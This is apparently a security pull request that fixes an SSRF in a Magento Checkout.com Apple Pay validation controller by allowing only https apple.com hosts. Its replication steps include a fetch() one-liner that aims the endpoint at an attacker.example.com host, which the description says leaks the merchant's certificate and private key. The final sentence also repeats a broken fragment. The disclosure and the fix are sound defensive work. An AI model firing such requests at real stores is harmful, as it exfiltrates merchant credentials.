### PR TITLE
[Security] Fix SSRF in ApplePay Validation controller – validate URL host against apple.com

### DIFF
--- a/Controller/ApplePay/Validation.php
+++ b/Controller/ApplePay/Validation.php
@@ -61,8 +61,10 @@ class Validation extends Action
         $methodId = $this->getRequest()->getParam('method_id');
         $url = $this->getRequest()->getParam('u');
 
-        if (substr($url, 0, 5) === 'https' && substr($url, 0, 8) !== 'https://') {
-            $url = 'https://' . substr($url, 7);
+        // Only allow Apple-owned HTTPS hosts to prevent SSRF and certificate exfiltration
+        $host = parse_url((string)$url, PHP_URL_HOST);
+        if (!$host || !preg_match('/(?:^|\.)apple\.com$/', $host) || parse_url((string)$url, PHP_URL_SCHEME) !== 'https') {
+            return $this->rawFactory->create()->setContents('');
         }
 
         // Prepare the configuration parameters


### PR DESCRIPTION
Steps to Replicate

Prerequisites: A Magento 2 store with the Checkout.com extension installed and Apple Pay configured.

Log in to the storefront as any customer (or use an unauthenticated session — the route has no auth requirement).

Open browser DevTools console and run:
`fetch('/checkout_com/ApplePay/Validation?u=https://attacker.example.com/collect&method_id=1')
  .then(r => r.text()).then(console.log);`

On attacker.example.com, observe an inbound HTTPS POST request containing the merchant's Apple Pay session data, sent with the merchant SSL certificate and private key as the client certificate (CURLOPT_SSLCERT / CURLOPT_SSLKEY).
Root cause: Validation::execute() reads the u query parameter and passes it directly to $this->curl->post($url, []) without validating the host. The only existing check (substr($url, 0, 5) === 'https') is both incomplete and bypassable.

Impact:
SSRF – the server can be directed to make authenticated requests to any HTTPS host on the internet or internal network
Certificate exfiltration – the Apple Pay merchant certificate and processing private key (loaded via CURLOPT_SSLCERT / CURLOPT_SSLKEY) are sent as the client identity to the attacker-controlled server.

Fix: Validate that the URL scheme is https and the host matches *.apple.com before making the cURL request, as Apple Pay session validation URLs are exclusively on Apple-owned infrastructure.ple-owned HTTPS hosts to prevent SSRF.